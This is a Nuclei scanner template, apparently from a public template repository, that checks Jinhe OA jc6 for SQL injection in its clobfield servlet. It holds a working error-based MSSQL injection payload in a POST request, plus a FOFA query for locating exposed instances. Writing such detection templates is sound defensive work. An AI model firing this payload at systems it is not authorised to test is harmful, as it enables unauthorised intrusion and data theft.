nuclei-templates/http/vulnerabilities/jinhe/jinhe-jc6-sqli.yaml

41 lines
1.4 KiB
YAML
Raw Normal View History

id: jinhe-jc6-sqli
2023-12-20 05:28:54 +00:00
info:
name: Jinhe OA - SQL Injection
2023-12-20 05:28:54 +00:00
author: Ky9oss
severity: high
description: |
SQL injection vulnerability in the ljc6/servlet/clobfield interface of Jinhe OA jc6. An attacker can obtain sensitive information.
reference:
- https://github.com/wy876/POC/blob/main/%E9%87%91%E5%92%8COA%20jc6%20clobfield%20SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.md
- https://blog.csdn.net/qq_41904294/article/details/135074649
metadata:
verified: true
max-request: 1
2023-12-20 05:28:54 +00:00
fofa-query: title="金和协同管理平台"
tags: jinher,jc6,sqli
variables:
num: "{{rand_int(9000000, 9999999)}}"
2023-12-20 05:28:54 +00:00
http:
- raw:
- |
POST /jc6/servlet/clobfield HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
key=readClob&sImgname=filename&sTablename=FC_ATTACH&sKeyname=djbh&sKeyvalue=11' and CONVERT(int,(select%20sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%27{{num}}%27))))=1 and ''='
2023-12-20 05:28:54 +00:00
matchers-condition: and
matchers:
- type: word
2023-12-20 05:28:54 +00:00
part: body
words:
- "{{md5(num)}}"
- "nvarchar"
condition: and
2023-12-20 05:28:54 +00:00
- type: status
status:
- 200
# digest: 4a0a0047304502206726a158706f7ebb2987a65814a25f2a2012706c76d83d334c0ce3bd81971ff70221008c8a5a170b64b8fc9d8efe30897108fe220e3684f2d87b56cba36fbe5bfa11e6:922c64590222798bb761d5b6d8e72950